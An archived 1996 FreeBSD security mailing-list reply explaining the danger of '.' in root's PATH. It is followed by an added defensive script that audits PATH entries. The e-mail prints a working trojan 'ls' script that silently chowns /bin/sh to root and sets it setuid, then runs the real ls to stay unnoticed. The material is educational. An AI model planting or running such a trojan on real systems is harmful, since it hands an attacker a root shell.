Date:      Tue, 25 Jun 1996 00:27:00 -0700
From:      "Michael L. VanLoon -- HeadCandy.com" <michaelv@HeadCandy.com>
To:        -Vince- <vince@mercury.gaianet.net>
Cc:        Mark Murray <mark@grumble.grondar.za>, hackers@freebsd.org, security@freebsd.org, Chad Shackley <chad@mercury.gaianet.net>, jbhunt <jbhunt@mercury.gaianet.net>
Subject:   Re: I need help on this one - please help me track this guy down! 
Message-ID:  <199606250727.AAA24988@MindBender.HeadCandy.com>
In-Reply-To: Your message of Mon, 24 Jun 96 23:32:55 -0700. <Pine.BSF.3.91.960624232727.21697c-100000@mercury.gaianet.net> 


>> 2) The Cracker made a trojan script somewhere (usually exploiting
>>    some admins (roots) who have "." in their path). This way he creates
>>    a script that when run as root will make him a suid program.
>>    after this he has you by tender bits.

>	Hmmm, doesn't everyone have . as their path since all . does is allow
>someone to run stuff from the current directory...

Assume root has "." in its path.  Hacker puts this little script in
his dir, maybe also in /tmp/; it's called "ls" (imagine the
coincidence), and it's executable by all:

	#!/bin/sh
	chown root /bin/sh > /dev/null 2>&1
	chmod u+s,a+x /bin/sh > /dev/null 2>&1
	ls $*

Then sits back and waits for the sysadmin to come along and type "ls"
in one of those directories.

Pop quiz: what is the result?

-----------------------------------------------------------------------------
  Michael L. VanLoon                                 michaelv@HeadCandy.com
        --<  Free your mind and your machine -- NetBSD free un*x  >--
    NetBSD working ports: 386+PC, Mac 68k, Amiga, Atari 68k, HP300, Sun3,
        Sun4/4c/4m, DEC MIPS, DEC Alpha, PC532, VAX, MVME68k, arm32...
    NetBSD ports in progress: PICA, others...

   Roll your own Internet access -- Seattle People's Internet cooperative.
                  If you're in the Seattle area, ask me how.
-----------------------------------------------------------------------------
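A defensive check for the condition the message describes, added here as an example that is not part of the original e-mail: it audits a PATH string for ".", empty entries (which the shell also reads as the current directory), other relative entries, and world-writable directories such as /tmp. The function names and the sample PATH are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit a PATH string for entries that let a planted "ls"
# run in place of the real one. Directory names below are constructed.

# True if anyone on the system may create files in directory $1.
# "$1/." makes find examine the directory itself even if $1 is a symlink.
is_world_writable() {
    [ -n "$(find "$1/." -prune -perm -0002 2>/dev/null)" ]
}

# audit_path PATHSTRING
# Prints "<position>: <reason>" per unsafe entry; exit status 1 if any found.
# Body runs in a subshell ( ... ) so its variables do not leak to the caller.
audit_path() (
    rest="$1:"          # trailing ':' so the last entry is processed too
    pos=0
    rc=0
    while [ -n "$rest" ]; do
        entry=${rest%%:*}   # text before the first ':'
        rest=${rest#*:}     # text after the first ':'
        pos=$((pos + 1))
        case "$entry" in
            "") echo "$pos: empty entry (the shell reads it as the current directory)"; rc=1 ;;
            /*) if is_world_writable "$entry"; then
                    echo "$pos: $entry is world-writable"; rc=1
                fi ;;
            *)  echo "$pos: $entry is relative to the current directory"; rc=1 ;;
        esac
    done
    exit "$rc"
)

# Constructed sample: the root PATH the message warns about, "." listed first.
audit_path ".:/sbin:/bin:/usr/sbin:/usr/bin" || echo "PATH is unsafe for root"
# Audit the live environment instead with: audit_path "$PATH"
```

A trailing or doubled colon is flagged the same way as ".", since the shell treats an empty PATH entry as the current directory.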


